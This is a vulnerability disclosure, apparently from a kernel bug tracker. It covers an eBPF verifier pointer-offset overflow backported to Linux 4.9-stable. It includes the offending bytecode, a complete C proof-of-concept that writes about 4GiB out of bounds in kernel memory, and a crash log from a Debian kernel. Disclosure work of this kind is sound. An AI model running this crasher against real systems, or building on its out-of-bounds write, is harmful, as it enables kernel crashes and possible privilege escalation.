An eBPF verifier bug was backported to the 4.9-stable kernel tree.
8a1c22a5152b26d19ce1cffd65c19ab9
eBPF verifier bug backported to 4.9-stable
Moving this one to a separate bug report...
Commit 332270fdc8b6 (https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit?id=332270fdc8b6fba07d059a9ad44df9e1a2ad4529) adds functionality that permits performing addition on PTR_TO_STACK (a stack pointer with a fixed offset) instead of just on FRAME_PTR (the stack pointer without an offset). Because the logic for adding offsets doesn't check for overflow, the following eBPF bytecode passes the verifier but performs an access that is around 4GiB out of bounds:
0: (b7) r2 = 0
1: (bf) r1 = r10
2: (07) r1 += 2147483647
3: (07) r1 += 2147483647
4: (73) *(u8 *)(r1 +0) = r2
5: (b4) (u32) r0 = (u32) 0
6: (95) exit
Unfortunately, this commit was backported to the 4.9 stable tree (https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git/commit/?id=7bca0a9702edfc8d0e7e46f984ca422ffdbe0498, first contained in v4.9.28), so this crasher works both against a fully updated Debian stable system (distro kernel, release 4.9.0-4-amd64, version "#1 SMP Debian 4.9.51-1 (2017-09-28)") and against a kernel built from the current net tree.
Full crasher:
======================
#define _GNU_SOURCE
#include <err.h>
#include <errno.h>
#include <stdint.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/syscall.h>
#include <asm/unistd_64.h>
#include <linux/bpf.h>
#include <linux/filter.h>
/* start from kernel */
/*
 * Instruction-builder macros copied from the kernel sources. Each one
 * expands to a `struct bpf_insn` compound literal (BPF_LD_IMM64_RAW expands
 * to two of them), so they can be used directly as array initializers.
 * Every macro argument is parenthesized so that arbitrary expressions can be
 * passed safely.
 */

/* Call instruction; imm carries FUNC exactly as given by the caller. */
#define BPF_EMIT_CALL(FUNC)					\
	((struct bpf_insn) {					\
		.code = BPF_JMP | BPF_CALL,			\
		.dst_reg = 0,					\
		.src_reg = 0,					\
		.off = 0,					\
		.imm = (FUNC) })

/* 32-bit move of an immediate: (u32) dst_reg = imm32 */
#define BPF_MOV32_IMM(DST, IMM)					\
	((struct bpf_insn) {					\
		.code = BPF_ALU | BPF_MOV | BPF_K,		\
		.dst_reg = (DST),				\
		.src_reg = 0,					\
		.off = 0,					\
		.imm = (IMM) })

/* Aliases for the registers used to pass arguments 1..5. */
#define BPF_REG_ARG1 BPF_REG_1
#define BPF_REG_ARG2 BPF_REG_2
#define BPF_REG_ARG3 BPF_REG_3
#define BPF_REG_ARG4 BPF_REG_4
#define BPF_REG_ARG5 BPF_REG_5

#define BPF_PSEUDO_MAP_FD 1

/*
 * 64-bit immediate load. Occupies two instruction slots: the first carries
 * the low 32 bits of IMM, the second (opcode 0) carries the high 32 bits.
 */
#define BPF_LD_IMM64_RAW(DST, SRC, IMM)				\
	((struct bpf_insn) {					\
		.code = BPF_LD | BPF_DW | BPF_IMM,		\
		.dst_reg = (DST),				\
		.src_reg = (SRC),				\
		.off = 0,					\
		.imm = (__u32) (IMM) }),			\
	((struct bpf_insn) {					\
		.code = 0, /* zero is reserved opcode */	\
		.dst_reg = 0,					\
		.src_reg = 0,					\
		.off = 0,					\
		.imm = ((__u64) (IMM)) >> 32 })

/* 32-bit ALU operation with an immediate operand: (u32) dst_reg OP= imm32 */
#define BPF_ALU32_IMM(OP, DST, IMM)				\
	((struct bpf_insn) {					\
		.code = BPF_ALU | BPF_OP(OP) | BPF_K,		\
		.dst_reg = (DST),				\
		.src_reg = 0,					\
		.off = 0,					\
		.imm = (IMM) })

/* 64-bit immediate load with src_reg = BPF_PSEUDO_MAP_FD and imm = MAP_FD. */
#define BPF_LD_MAP_FD(DST, MAP_FD)				\
	BPF_LD_IMM64_RAW(DST, BPF_PSEUDO_MAP_FD, MAP_FD)

/* 32-bit ALU operation with a register operand: (u32) dst_reg OP= src_reg */
#define BPF_ALU32_REG(OP, DST, SRC)				\
	((struct bpf_insn) {					\
		.code = BPF_ALU | BPF_OP(OP) | BPF_X,		\
		.dst_reg = (DST),				\
		.src_reg = (SRC),				\
		.off = 0,					\
		.imm = 0 })

/* Program exit. */
#define BPF_EXIT_INSN()						\
	((struct bpf_insn) {					\
		.code = BPF_JMP | BPF_EXIT,			\
		.dst_reg = 0,					\
		.src_reg = 0,					\
		.off = 0,					\
		.imm = 0 })

/* Memory store, *(uint *) (dst_reg + off16) = src_reg */
#define BPF_STX_MEM(SIZE, DST, SRC, OFF)			\
	((struct bpf_insn) {					\
		.code = BPF_STX | BPF_SIZE(SIZE) | BPF_MEM,	\
		.dst_reg = (DST),				\
		.src_reg = (SRC),				\
		.off = (OFF),					\
		.imm = 0 })

/* Alias for the frame pointer register. */
#define BPF_REG_FP BPF_REG_10

/* 64-bit register move: dst_reg = src_reg */
#define BPF_MOV64_REG(DST, SRC)					\
	((struct bpf_insn) {					\
		.code = BPF_ALU64 | BPF_MOV | BPF_X,		\
		.dst_reg = (DST),				\
		.src_reg = (SRC),				\
		.off = 0,					\
		.imm = 0 })

/* 64-bit ALU operation with an immediate operand: dst_reg OP= imm32 */
#define BPF_ALU64_IMM(OP, DST, IMM)				\
	((struct bpf_insn) {					\
		.code = BPF_ALU64 | BPF_OP(OP) | BPF_K,		\
		.dst_reg = (DST),				\
		.src_reg = 0,					\
		.off = 0,					\
		.imm = (IMM) })

/* Alias for the register this file uses as a temporary. */
#define BPF_REG_TMP BPF_REG_8

/* Memory load, dst_reg = *(uint *) (src_reg + off16) */
#define BPF_LDX_MEM(SIZE, DST, SRC, OFF)			\
	((struct bpf_insn) {					\
		.code = BPF_LDX | BPF_SIZE(SIZE) | BPF_MEM,	\
		.dst_reg = (DST),				\
		.src_reg = (SRC),				\
		.off = (OFF),					\
		.imm = 0 })

/* Conditional jump comparing dst_reg against an immediate; OFF is the jump offset. */
#define BPF_JMP_IMM(OP, DST, IMM, OFF)				\
	((struct bpf_insn) {					\
		.code = BPF_JMP | BPF_OP(OP) | BPF_K,		\
		.dst_reg = (DST),				\
		.src_reg = 0,					\
		.off = (OFF),					\
		.imm = (IMM) })

/* 64-bit move of an immediate: dst_reg = imm32 */
#define BPF_MOV64_IMM(DST, IMM)					\
	((struct bpf_insn) {					\
		.code = BPF_ALU64 | BPF_MOV | BPF_K,		\
		.dst_reg = (DST),				\
		.src_reg = 0,					\
		.off = 0,					\
		.imm = (IMM) })

/* 64-bit ALU operation with a register operand: dst_reg OP= src_reg */
#define BPF_ALU64_REG(OP, DST, SRC)				\
	((struct bpf_insn) {					\
		.code = BPF_ALU64 | BPF_OP(OP) | BPF_X,		\
		.dst_reg = (DST),				\
		.src_reg = (SRC),				\
		.off = 0,					\
		.imm = 0 })

/* 32-bit register move: (u32) dst_reg = (u32) src_reg */
#define BPF_MOV32_REG(DST, SRC)					\
	((struct bpf_insn) {					\
		.code = BPF_ALU | BPF_MOV | BPF_X,		\
		.dst_reg = (DST),				\
		.src_reg = (SRC),				\
		.off = 0,					\
		.imm = 0 })
/* end from kernel */
/*
 * Minimal wrapper around the raw bpf system call.
 *
 * cmd   - bpf command number, passed through unchanged.
 * attrs - attribute union for the command; its full size is passed as the
 *         size argument.
 *
 * Returns the result of syscall(), narrowed to int.
 */
int bpf_(int cmd, union bpf_attr *attrs) {
	long rc = syscall(__NR_bpf, cmd, attrs, sizeof *attrs);

	return (int)rc;
}
/*
 * Store `value` under index `key` in the BPF map referred to by `mapfd`.
 * Terminates the process through err() if the update fails.
 *
 * The value is first widened into a 64-bit local. main() creates the map
 * with value_size = 8, and for BPF_MAP_UPDATE_ELEM the kernel reads
 * value_size bytes from the value pointer; pointing it at a 4-byte uint32_t
 * would make the kernel read 4 bytes past that object. The upper half of
 * the stored element is therefore always zero.
 */
void array_set(int mapfd, uint32_t key, uint32_t value) {
	uint64_t wide_value = value;
	union bpf_attr attr = {
		.map_fd = mapfd,
		/* go through uintptr_t so the pointer-to-integer conversion is well-defined */
		.key = (uint64_t)(uintptr_t)&key,
		.value = (uint64_t)(uintptr_t)&wide_value,
		.flags = BPF_ANY,
	};

	if (bpf_(BPF_MAP_UPDATE_ELEM, &attr)) {
		err(1, "map update elem");
	}
}
/*
 * Proof-of-concept driver.
 *
 * Creates an array map, loads a socket-filter program whose only job is to
 * store one byte through a stack pointer that was advanced twice by
 * 0x7fffffff, attaches it to one end of a UNIX datagram socket pair and
 * then sends a single byte through the pair.
 *
 * Returns 1 if the program fails to load (after printing the verifier log),
 * exits through err() on any other failure, and returns 0 otherwise.
 */
int main(void) {
	/* The map is only referenced by the disabled instruction sequence below. */
	union bpf_attr create_map_attrs = {
		.map_type = BPF_MAP_TYPE_ARRAY,
		.key_size = 4,
		.value_size = 8,
		.max_entries = 16
	};
	int mapfd = bpf_(BPF_MAP_CREATE, &create_map_attrs);
	if (mapfd == -1)
		err(1, "map create");
	array_set(mapfd, 1, 1);

	/*
	 * Zero-initialized so that puts() below sees a valid (empty) string
	 * even when the load fails before anything is written to the log.
	 */
	char verifier_log[100000] = "";
	struct bpf_insn insns[] = {
		/*
		 * Disabled earlier variant, kept for reference:
		 *
		BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
		// fill r3 with value in range [0x0, 0xf], actually 0x8:
		// first load map value pointer...
		BPF_MOV64_REG(BPF_REG_TMP, BPF_REG_FP),
		BPF_ALU64_IMM(BPF_ADD, BPF_REG_TMP, -4), // allocate 4 bytes stack
		BPF_MOV32_IMM(BPF_REG_ARG2, 1),
		BPF_STX_MEM(BPF_W, BPF_REG_TMP, BPF_REG_ARG2, 0),
		BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_TMP),
		BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
		BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 2),
		BPF_MOV64_REG(BPF_REG_0, 0), // prepare exit
		BPF_EXIT_INSN(), // exit
		// ... then write, read, mask map value
		// (tracing actual values through a map is impossible)
		BPF_MOV32_IMM(BPF_REG_3, 8),
		BPF_STX_MEM(BPF_W, BPF_REG_0, BPF_REG_3, 0),
		BPF_LDX_MEM(BPF_W, BPF_REG_3, BPF_REG_0, 0),
		BPF_ALU64_IMM(BPF_AND, BPF_REG_3, 0xf),
		// negate
		BPF_MOV64_IMM(BPF_REG_4, 0),
		// r4 = [-0xf, 0x0]
		BPF_ALU64_REG(BPF_SUB, BPF_REG_4, BPF_REG_3),
		// r5 = fp
		BPF_MOV64_REG(BPF_REG_5, BPF_REG_10),
		// r5 = fp - 4
		BPF_ALU64_IMM(BPF_ADD, BPF_REG_5, -4),
		BPF_STX_MEM(BPF_W, BPF_REG_5, BPF_REG_4, 0),
		// r5 = fp - 4 - [0x0, 0xf]
		BPF_ALU64_REG(BPF_ADD, BPF_REG_5, BPF_REG_4),
		BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd),
		BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_5),
		BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem),
		*/
		// zero register
		BPF_MOV64_IMM(BPF_REG_2, 0),
		// copy fp
		BPF_MOV64_REG(BPF_REG_1, BPF_REG_10),
		// adjust fp up maximally (0x7fff'ffff),
		// resulting in an sp
		BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, 0x7fffffff),
		// ... and now, thanks to 7bca0a9702edf, we get
		// to do that again! this will wrap to negative
		// in the verifier.
		BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, 0x7fffffff),
		// now store some stuff 4GB out of bounds
		BPF_STX_MEM(BPF_B, BPF_REG_1, BPF_REG_2, 0),
		// terminate to make the verifier happy
		BPF_MOV32_IMM(BPF_REG_0, 0),
		BPF_EXIT_INSN()
	};
	union bpf_attr create_prog_attrs = {
		.prog_type = BPF_PROG_TYPE_SOCKET_FILTER,
		.insn_cnt = sizeof(insns) / sizeof(insns[0]),
		.insns = (uint64_t)(uintptr_t)insns,
		.license = (uint64_t)(uintptr_t)"",
		.log_level = 2,
		.log_size = sizeof(verifier_log),
		.log_buf = (uint64_t)(uintptr_t)verifier_log
	};
	int progfd = bpf_(BPF_PROG_LOAD, &create_prog_attrs);
	/* puts() may overwrite errno, so remember the load error for perror(). */
	int load_errno = errno;
	puts(verifier_log);
	if (progfd == -1) {
		errno = load_errno;
		perror("prog load");
		return 1;
	}
	puts("ok so far?");

	/* Attach the program to one socket and push a byte through the pair. */
	int socks[2];
	if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks))
		err(1, "socketpair");
	if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)))
		err(1, "setsockopt");
	if (write(socks[1], "a", 1) != 1)
		err(1, "write");
	char c;
	if (read(socks[0], &c, 1) != 1)
		err(1, "read res");
	return 0;
}
======================
Crash example with a Debian stable distro kernel (note the pointer in RCX that points roughly 4GiB behind RSP):
======================
[ 51.597474] BUG: unable to handle kernel paging request at ffffa97bc214fcbe
[ 51.597478] IP: [<ffffffff96d5bd46>] __bpf_prog_run+0xb46/0x11e0
[ 51.597490] PGD 2370a0067
[ 51.597490] PUD 0
[ 51.597493] Oops: 0002 [#1] SMP
[ 51.597495] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep snd_pcm qxl snd_timer ttm snd soundcore drm_kms_helper pcspkr evdev ppdev serio_raw drm parport_pc crct10dif_pclmul parport crc32_pclmul ghash_clmulni_intel virtio_console virtio_balloon sg binfmt_misc button ip_tables x_tables autofs4 ext4 crc16 jbd2 crc32c_generic fscrypto ecb mbcache sd_mod sr_mod cdrom ata_generic 8139too crc32c_intel aesni_intel aes_x86_64 glue_helper lrw gf128mul ablk_helper cryptd ata_piix ehci_pci uhci_hcd ehci_hcd libata virtio_pci psmouse virtio_ring usbcore 8139cp virtio scsi_mod usb_common mii i2c_piix4 floppy
[ 51.597517] CPU: 2 PID: 1106 Comm: crasher_double_ Not tainted 4.9.0-4-amd64 #1 Debian 4.9.51-1
[ 51.597518] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.10.2-1 04/01/2014
[ 51.597519] task: ffff9a1bb3736100 task.stack: ffffa97ac214c000
[ 51.597519] RIP: 0010:[<ffffffff96d5bd46>] [<ffffffff96d5bd46>] __bpf_prog_run+0xb46/0x11e0
[ 51.597521] RSP: 0018:ffffa97ac214fa60 EFLAGS: 00010202
[ 51.597522] RAX: 0000000000000000 RBX: ffffa97ac0ebd050 RCX: ffffa97bc214fcbe
[ 51.597523] RDX: 0000000000000000 RSI: ffffa97ac0ebd028 RDI: ffff9a1bb577c900
[ 51.597523] RBP: ffffffff9741fb60 R08: ffff9a1bb70006c0 R09: ffff9a1bb3925000
[ 51.597524] R10: ffff9a1bb18afc00 R11: 0000000000000000 R12: 0000000000000000
[ 51.597525] R13: ffffa97ac0ebd000 R14: 0000000000000000 R15: 0000000000000001
[ 51.597526] FS: 00007fc6afade700(0000) GS:ffff9a1bbfc80000(0000) knlGS:0000000000000000
[ 51.597529] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 51.597530] CR2: ffffa97bc214fcbe CR3: 000000023100f000 CR4: 00000000001406e0
[ 51.597532] Stack:
[ 51.597533] 0000000000000000 00000000024280ca ffffa97bc214fcbe 0000000000000000
[ 51.597535] 00000000027080c0 ffffa97ac214faa0 ffffffff96d86956 ffff9a1bbfff9cc0
[ 51.597536] ffff9a1bbfff9cc0 ffffffffffffffff 00000000000000f0 ffffa97ac214fcc0
[ 51.597537] Call Trace:
[ 51.597544] [<ffffffff96d86956>] ? __alloc_pages_nodemask+0xf6/0x260
[ 51.597549] [<ffffffff96f485c9>] ? list_del+0x9/0x30
[ 51.597551] [<ffffffff96d83f66>] ? __rmqueue+0x96/0x400
[ 51.597555] [<ffffffff96c623bd>] ? __change_page_attr_set_clr+0x88d/0xda0
[ 51.597556] [<ffffffff96f485c9>] ? list_del+0x9/0x30
[ 51.597564] [<ffffffff970ebade>] ? __kmalloc_reserve.isra.35+0x2e/0x80
[ 51.597567] [<ffffffff96c47378>] ? native_send_call_func_ipi+0xe8/0xf0
[ 51.597568] [<ffffffff970ebade>] ? __kmalloc_reserve.isra.35+0x2e/0x80
[ 51.597570] [<ffffffff970ec8e6>] ? __alloc_skb+0x96/0x1e0
[ 51.597574] [<ffffffff96dfedba>] ? __check_object_size+0xfa/0x1d8
[ 51.597576] [<ffffffff96f3ef43>] ? copy_from_iter+0x93/0x370
[ 51.597580] [<ffffffff9711a3a9>] ? sk_filter_trim_cap+0x59/0x2a0
[ 51.597585] [<ffffffff971a9c66>] ? unix_dgram_sendmsg+0x276/0x720
[ 51.597587] [<ffffffff970e4880>] ? sock_sendmsg+0x30/0x40
[ 51.597588] [<ffffffff970e4917>] ? sock_write_iter+0x87/0x100
[ 51.597589] [<ffffffff96e0254a>] ? new_sync_write+0xda/0x130
[ 51.597590] [<ffffffff96e02cb0>] ? vfs_write+0xb0/0x190
[ 51.597592] [<ffffffff96e040a2>] ? SyS_write+0x52/0xc0
[ 51.597600] [<ffffffff972085bb>] ? system_call_fast_compare_end+0xc/0x9b
[ 51.597601] Code: 02 00 00 5b 5d 41 5c c3 0f b6 43 01 48 0f bf 53 02 48 83 c3 08 48 89 c1 c0 e8 04 83 e1 0f 83 e0 0f 48 8b 44 c4 08 48 8b 4c cc 08 <88> 04 11 0f b6 03 ff 64 c5 00 0f b6 43 01 48 0f bf 53 02 48 83
[ 51.597616] RIP [<ffffffff96d5bd46>] __bpf_prog_run+0xb46/0x11e0
[ 51.597618] RSP <ffffa97ac214fa60>
[ 51.597618] CR2: ffffa97bc214fcbe
[ 51.597620] ---[ end trace f23ad85c8b2cbd27 ]---
======================
Found by: jannh